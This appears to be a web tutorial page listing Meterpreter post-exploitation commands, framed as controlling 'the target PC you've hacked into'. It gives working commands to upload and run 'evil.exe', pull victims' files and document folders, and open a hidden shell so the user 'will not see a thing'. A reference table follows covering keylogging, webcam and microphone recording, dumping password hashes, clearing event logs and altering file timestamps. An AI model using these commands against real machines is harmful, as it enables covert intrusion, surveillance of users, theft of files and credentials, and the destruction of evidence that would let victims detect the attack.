Meterpreter commands

Please log in to use all features and tutorials

This tutorial is a continuation of the previous Using metasploit tutorials, and will list the different commands you can use to manipulate the target PC you've hacked into.

Most interesting commands:

meterpreter > getuid (this will show you currently logged in user)
meterpreter > idletime (wanna see how long user has afk?)

meterpreter > help (this will show you a massive list of amzing commands to use!)
meterpreter > use priv (then check help again, more privilidged commands now eh?)

meterpreter > upload evil.exe evil.exe (uploads the file from this machine over to the customer)
meterpreter > download secret.txt secret.txt (downloads the txt file to our machine)

meterpreter > cd Documents and settings (cd's to a folder with spaces in it.)
meterpreter > ls (this is an example of the bash type commands we have on the target win machine, version of dir)

meterpreter > download -r “My Documents” /home/root/Documents (This would download the entire My Docs folder over to us.

meterpreter > execute -f evil.exe (executed the file on the customer)

meterpreter > execute -f cmd.exe -c -H -i (-f executes, cmd.exe shell on target, channelized, hidden, interactive)
(customer will not see a thing your doing as all the options are set properly)

All commands:

Core Commands
==

Command Description
-- --
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel

Stdapi: File system Commands
==

Command Description
-- --
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory

Stdapi: Networking Commands
==

Command Description
-- --
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
==

Command Description
-- --
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Get as many privileges as possible
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
==

Command Description
-- --
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components

Stdapi: Webcam Commands
==

Command Description
-- --
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam

Priv: Elevate Commands
==

Command Description
-- --
getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
==

Command Description
-- --
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
==

Command Description
-- --
timestomp Manipulate file MACE attributes

Comments

lAnonymous's picture

Cono. Uso este programa es

Cono. Uso este programa es el unico que o se usar

lAnonymous's picture

Cono. Uso este programa es

Cono. Uso este programa es el unico que o se usar